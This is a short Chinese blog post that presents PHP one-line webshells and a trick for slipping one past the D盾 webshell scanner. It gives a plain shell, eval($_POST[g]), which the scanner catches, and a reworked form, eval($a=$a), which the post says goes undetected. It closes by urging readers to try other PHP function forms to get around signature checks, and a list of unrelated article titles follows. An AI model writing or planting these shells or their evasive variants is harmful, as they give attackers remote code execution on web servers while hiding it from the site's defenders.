一个很简单的一个技巧,作个笔记,可以绕过D盾检测。

新建test1.php

<?php

eval($_POST[g]);

?>

新建test2.php

<?php

$a="$_POST[g]";

eval($a=$a);

?>

使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。

那么问题就出现在eval($a=$a)这样的形式,eval()很容易就被查杀出来,但对于这样一种形式就无法查杀。

可以预见基于特征的代码查杀,在一定程度上能够检测出一些问题,但是对于一些特殊形式的变形,还是无法查杀。

PHP是一门很灵活的语言,可以通过它的特性,去尝试更多的函数形式,达到绕过的效果。

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

最新文章

  1. 后台管理UI的选择
  2. symbol table meaning
  3. Visual Studio: 暂时?绕过 fatal error C1083: Cannot open precompiled header file
  4. C#数组的声明方式
  5. JS页面跳转 神器! window.href window.open
  6. C++用于修饰的keyword
  7. .NET里的行为驱动开发
  8. 2016弱校联盟十一专场10.2——Floyd-Warshall
  9. oracle物理视图(转)
  10. ABP+AdminLTE+Bootstrap Table权限管理系统一期
  11. markdown 字体颜色
  12. spring的applicationContext.xml没有自动提示(使用本地的文档)
  13. MAC地址表配置与绑定
  14. 关于Android 7.0(API24)相机的问题汇总
  15. SpringBoot 项目在静态工具类中注入 RedisTemplate
  16. python redis存入字典序列化存储
  17. maven的安装以及问题
  18. [LeetCode&amp;Python] Problem 653. Two Sum IV - Input is a BST
  19. vue router 跳转到新的窗口方法
  20. [转载]JavaScript异步编程助手:Promise模式

热门文章

  1. 客户端通过HTTP协议与服务端交换数据
  2. js在IE与firefox的差别。。。
  3. Writing a Reusable Custom Control in WPF
  4. pymysql和MySQLdb
  5. 单表多个Count 条件进行查询拼接小妙用
  6. DataFrame在算术方法中填充值
  7. [转]Android--多线程之Handler
  8. 使用jenkins配置.net mvc网站进行持续集成
  9. php中对象(object)与数组(array)之间的相互转换
  10. python的sciter库Pysciter安装教程(win32 + win64)